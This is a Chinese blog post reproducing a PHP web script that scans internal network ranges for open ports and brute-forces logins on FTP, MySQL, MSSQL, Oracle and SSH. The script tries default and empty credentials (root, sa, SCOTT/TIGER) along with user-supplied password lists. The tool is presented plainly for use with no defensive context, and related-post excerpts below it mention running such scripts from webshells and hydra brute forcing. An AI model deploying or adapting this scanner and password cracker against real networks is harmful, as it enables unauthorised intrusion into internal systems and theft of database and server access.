写个php来扫内网端口,PHP内网端口扫描脚本

于 2021-04-14 13:01:57 发布
阅读量448 收藏
点赞数
文章标签: 写个php来扫内网端口

#Class B PHP port scanner by anthrax @ insight-labs.org

session_start();

set_time_limit(0);

ob_implicit_flush(True);

ob_end_flush();

function check_port($ip,$port,$timeout=0.1) {

$conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);

if ($conn) {

fclose($conn);

return true;

}

}

function crackpwd($addr,$port,$userlist,$passlist,$type){

switch($type){

case 'ftp':

$ftp=@ftp_connect($addr,$port);

if(@ftp_login($ftp,'anonymous','safasf#asfs.com')){

echo "$addr".':'.$port.' Anonymous Login enabled'.'';

}

foreach($userlist as $username){

foreach($passlist as $pass){

if(@ftp_login($ftp,$username,$pass)){

echo "FTP $addr".':'.$port.'Username: '.$username.' pwd: '.$pass.'';

}

}

}

ftp_close($ftp);

break;

case 'mysql':

if(@mysql_connect($addr.':'.$port, 'root', '')){

echo 'MySQL Username: root EMPTY PASSWORD';

}

foreach($userlist as $username){

foreach($passlist as $pass){

if(@mysql_connect($addr.':'.$port, $username, $pass)){

echo 'MySQL Username: '.$username.' pwd: '.$pass.'';

}

}

}

break;

case 'mssql':

if(@mssql_connect($addr,'sa','')){

echo 'MSSQL Username: sa EMPTY PASSWORD';

}

foreach($userlist as $username){

foreach($passlist as $pass){

if(@mssql_connect($addr, $username, $pass)){

echo 'MSSQL Username: '.$username.' pwd: '.$pass.'';

}

}

}

break;

case 'oracle':

if(@oci_connect('SCOTT','TIGER',$addr)){

echo 'Oracle Username SCOTT pwd: TIGER';

}

if(@oci_connect('SYSTEM','MANAGER',$addr)){

echo 'Oracle Username SYSTEM pwd: MANAGER';

}

if(@oci_connect('DBSNMP','DBSNMP',$addr)){

echo 'Oracle Username DBSNMP pwd: DBSNMP';

}

foreach($userlist as $username){

foreach($passlist as $pass){

if(@oci_connect($username,$pass,$addr)){

echo 'Oracle Username: '.$username.' pwd: '.$pass.'';

}

}

}

break;

case 'ssh':

$ssh=@ssh2_connect($addr,'22');

foreach($userlist as $username){

foreach($passlist as $pass){

if(@ssh2_auth_password($ssh,$username,$pass)){

echo 'SSH Username: '.$username.' pwd: '.$pass.'';

}

}

}

break;

}

}

function scanip($ip,$timeout){

$portarr=array(

'21'=>'FTP',

'22'=>'SSH',

'23'=>'Telnet',

'25'=>'SMTP',

'79'=>'Finger',

'80'=>'HTTP',

'81'=>'HTTP/Proxy',

'110'=>'POP3',

'135'=>'MS Netbios',

'139'=>'MS Netbios',

'143'=>'IMAP',

'162'=>'SNMP',

'389'=>'LDAP',

'443'=>'HTTPS',

'445'=>'MS SMB',

'873'=>'rsync',

'1080'=>'Proxy/HTTP Server',

'1433'=>'MS SQL Server',

'2433'=>'MS SQL Server Hidden',

'1521'=>'Oracle DB Server',

'1522'=>'Oracle DB Server',

'3128'=>'Squid Cache Server',

'3129'=>'Squid Cache Server',

'3306'=>'MySQL Server',

'3307'=>'MySQL Server',

'3500'=>'Squid Cache Server',

'3389'=>'MS Terminal Service',

'5800'=>'VNC Server',

'5900'=>'VNC Server',

'8080'=>'Proxy/HTTP Server',

'10000'=>'Webmin',

'11211'=>'Memcached'

);

foreach($portarr as $port=>$name){

if(check_port($ip,$port,$timeout=0.1)==True){

echo 'Port: '.$port.' '.$name.' is open';

@ob_flush();

@flush();

if(isset($_SESSION['crack'])||$_SESSION['crack']==true){

switch($port){

case '21':

$type='ftp';

break;

case '22':

$type='ssh';

break;

case '1433':

$type='mssql';

break;

case '1521':

case '1522':

$type='oracle';

break;

case '3306':

case '3307':

$type='mysql';

break;

default:

$type=false;

}

if($type){

global $userarr,$passarr;

crackpwd($ip,$port,$userarr,$passarr,$type);

@ob_flush();

@flush();

}

}//if

}

}

}

if(!isset($_SESSION['startip'])){

$_SESSION['startip']='Start IP';

$_SESSION['endip']='End IP';

$_SESSION['username']='root

admin';

$_SESSION['password']='123456

root

123123

admin

qwerty';

}

echo '

Timeout

Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP

'.$_SESSION['username'].'

'.$_SESSION['password'].'

Scan

';

if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){

if(isset($_POST['crack'])){

global $userarr,$passarr;

$_SESSION['crack']=true;

$userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username'])));

$passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password'])));

$_SESSION['username']=$_POST['username'];

$_SESSION['password']=$_POST['password'];

}

$startip=$_POST['startip'];

$endip=$_POST['endip'];

$timeout=$_POST['timeout'];

$siparr=explode('.',$startip);

$eiparr=explode('.',$endip);

$ciparr=$siparr;

if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){

exit('IP error: Wrong IP address or Trying to scan class A address');

}

$_SESSION['startip']=$startip;

$_SESSION['endip']=$endip;

if($startip==$endip){

echo 'Scanning IP '.$startip.'';

@ob_flush();

@flush();

scanip($startip,$timeout);

@ob_flush();

@flush();

exit();

}

if($eiparr[3]!=255){

$eiparr[3]+=1;

}

while($ciparr!=$eiparr){

$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];

echo 'Scanning IP '.$ip.'';

@ob_flush();

@flush();

scanip($ip,$timeout);

$ciparr[3]+=1;

if($ciparr[3]>255){

$ciparr[2]+=1;

$ciparr[3]=0;

}

if($ciparr[2]>255){

$ciparr[1]+=1;

$ciparr[2]=0;

}

}

}else{

exit('Missing input');

}

?>

歪头羊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
端口扫描脚本
11-09
在实际的内网渗透中,端口扫描脚本可能会包含更复杂的策略,如分块扫描以避免被检测,或者使用代理来隐藏源IP。此外,还可以结合Nmap等专业扫描工具的API,以提高扫描的效率和准确性。 总之,端口扫描是网络安全和...
内网端口脚本.rar
05-14
"内网端口脚本.rar" 提供的资源可能是一个包含自动化工具的压缩包,用于在特定的内网IP地址段(如C类网络)上执行端口扫描。下面我们将深入探讨内网扫描端口扫描的基本概念,以及如何使用PHP编写扫描脚本。 一...
PHPFTP\MYSQL\MSSQL\SSH密码的脚本
weixin_33725239的博客
12-04 81
可以FTPMYSQLMSSQLSSH密码 比如webshell在linux下。不会在LINUX下***。可以试试这个。 <?php@set_magic_quotes_runtime(0);@set_time_limit(0);//允许程序在register_globals=off的环境下工作$onoff=function_exis...
在线php网站扫描,php实现在线端口扫描实例代码_PHP教程
weixin_39528697的博客
03-11 164
if (!empty($remoteip)){function err() {die(" 对不起,该IP地址不合法点击这里返回");}// 定义提交错误IP的提示信息$ips=explode(".",$remoteip);// 用.分割IP地址if (intval($ips[0])<1 or intval($ips[0])>255 or intval($ips[3])<1 or ...
端口扫描脚本 php,批处理实现的网络巡检脚本(PING与端口扫描
weixin_42567279的博客
03-25 200
check.bat 内容(脚本内容可能会应为排版问题不能直接复制粘帖运行,可自行修改):@echo offrem checklist.csv字段为: IP,名称,描述,TCP应用端口,UDP应用端口rem checklist.csv中请使用,@,替换,, 并不要使用()进行内容描述set e_file=error.logset e_count=0for /f "skip=1 tokens=1,2,...
端口扫描php,一个简单的php在线端口扫描器_PHP
weixin_39525118的博客
03-09 190
if (!empty($remoteip)){// 如果表单不为空就进入IP地址格式的判断function err() {die("对不起,该IP地址不合法}// 定义提交错误IP的提示信息$ips=explode(".",$remoteip);// 用.分割IP地址if (intval($ips[0])<1 or intval($ips[0])>255 or intval($ips[...
php开放端口扫描,PHP应用:利用 fsockopen() 函数开放端口扫描器的实例
weixin_31047023的博客
03-12 133
PHP应用:利用 fsockopen() 函数开放端口扫描器的实例》要点:本文介绍了PHP应用:利用 fsockopen() 函数开放端口扫描器的实例,希望对您有用。如果有疑问,可以联系我们。1、前言PHP教程本文利用 fsockopen() 函数,编写一个功能简单的端口扫描器.PHP教程2、关键技术PHP教程本实例的端口号是固定的,通过对数组的遍历,利用 fsockopen() 函数连接,如果...
基于 Python+Go 的端口扫描及服务探测脚本
01-12
期由于公司环境整改/迭代以及历史弱口令等撞库,运维同事将内网测试环境的一些 SSH 等敏感端口对外,导致被挖矿团伙利用进行挖矿,虽然生产环境存在物理隔离,但仍存在极大安全风险,对此需要对所有用户进行端口对外...
frp内网穿透工具,附自动拉起脚本
10-24
frp内网穿透工具,附frp服务端、客户端自动拉起脚本。 支持TCP,UDP,HTTP,HTTPS等协议类型。 适用情况:实现内网服务通过端口映射的方式暴露在公网环境里。要求:有一台有公网IP的服务器。
IPOP4 内网端口转发工具
最新发布
06-14
IPOP4内网端口转发工具结合RTPS协议,可能意味着该工具不仅提供基础的端口映射功能,还可能支持更高级的数据传输特性,如实时性、数据优先级和流量控制,这对于需要处理大量实时数据的内网应用来说非常有益。...
PHP 端口扫描工具
Geek彬的博客
11-26 1387
$arr = [80,8080,3306]; foreach ($arr as $port) { $fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1); if (!$fp) { echo $port." closed\n"; }else{ echo $port." Opend...
内网拓展——端口扫描端口漏洞扫描
cxrpty的博客
03-25 3549
实验一:端口弱口令扫描 实验环境:kali和win3 实验步骤: 利用kali里的九头蛇工具 1.利用nmap查看目标机的端口 2.利用九头蛇hydra工具进行爆破 输入: hydra -L user.txt -P pass.txt 192.168.240.135(目标ip) smb(爆破的服务名) 实验二:利用namp脚本 实验环境:kali和win3 实验...
php 端口扫描
Ambulong的博客
08-09 1664
$ip = '192.168.97.'; for($i=1;$i       system("nc -v -z {$ip}.{$i} 80");       system("nc -v -z {$ip}.{$i} 81");       system("nc -v -z {$ip}.{$i} 8080");       system("nc -v -z {$ip}.{$i} 88
一个简单的php在线端口扫描
11-13 995
前言   PHP是一种功能强大的Web开发语言。开发效率高,语法简单,为动态网站量身定做,加强面向对象(向C++靠拢,与JAVA搭了点边),可惜单线程(这是至命弱点,据说PHP是用C/C++编写的。),也能用C、C++、JAVA开发中间层,调用COM,服务器维护难度小,故障少。   既然是为动态网站量身定做,所以注定不能开发出X-scan这样的超强扫描器,不过如果要实现一些简单的功能,还是绰绰有余
端口扫描php,一个简单的php在线端口扫描
weixin_31523833的博客
03-09 415
作者:angel前言PHP是一种功能强大的Web开发语言。开发效率高,语法简单,为动态网站量身定做,加强面向对象(向C++靠拢,与JAVA搭了点边),可惜单线程(这是至命弱点,据说PHP是用C\C++编写的。),也能用C、C++、JAVA开发中间层,调用COM,服务器维护难度小,故障少。既然是为动态网站量身定做,所以注定不能开发出X-scan这样的超强扫描器,不过如果要实现一些简单的功能,还是绰绰...
扫描端口脚本 -- PHP CLI 版本
qq_25234671的博客
03-12 262
<?php //扫描端口脚本 -- PHP CLI 版本 if(!extension_loaded('sockets')){ die('sockets has not open'); } echo 'Please enter the host name or IP address'."\r\n"; $host = trim(fgets(STDIN)); $host = str_r...
python写一个扫描当前内网存活主机端口脚本
04-24
好的,您可以试试这个代码: ```python import socket def scan_port(ip, port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ...您可以修改脚本中的IP地址段和扫描端口的范围来满足您的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值